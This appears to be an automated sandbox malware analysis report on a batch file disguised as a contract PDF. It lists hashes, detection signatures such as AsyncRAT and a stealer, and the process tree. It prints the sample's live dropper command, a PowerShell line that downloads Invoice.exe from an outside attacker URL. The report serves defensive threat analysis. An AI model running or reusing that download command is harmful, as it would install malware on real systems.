Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-02-2025 15:32
Static task
static1
Behavioral task
behavioral1
Sample
CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat
Resource
win7-20240903-en
5 signatures
300 seconds
Behavioral task
behavioral2
Sample
CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat
Resource
win10v2004-20250129-en
asyncratstormkittydefaultdiscoveryexecutionpersistenceprivilege_escalationpyinstallerratspywarestealer
25 signatures
300 seconds
General
-
Target
CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat
-
Size
349B
-
MD5
512ff935108c90d1338702a7af2d56f7
-
SHA1
fc9a789bd4811be4dffc04c9475daaad3413e546
-
SHA256
de11223dc99c7be3dab1e860b3c582a138432cf6d234ba335a1f51bd95894579
-
SHA512
6f8c350373e660c0546578039ccf20399ac7fe1eb4037e75124ac6dfbf2e555ffabe0550883bb3a83d7c7665d716bfc9ab379acd7baf559e747eba195da7461f
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://igorbende.online/Main/Invoice.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2412 powershell.exe 6 2412 powershell.exe -
pid Process 2412 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2412 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2540 wrote to memory of 2412 2540 cmd.exe 31 PID 2540 wrote to memory of 2412 2540 cmd.exe 31 PID 2540 wrote to memory of 2412 2540 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://igorbende.online/Main/Invoice.exe', 'Invoice.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-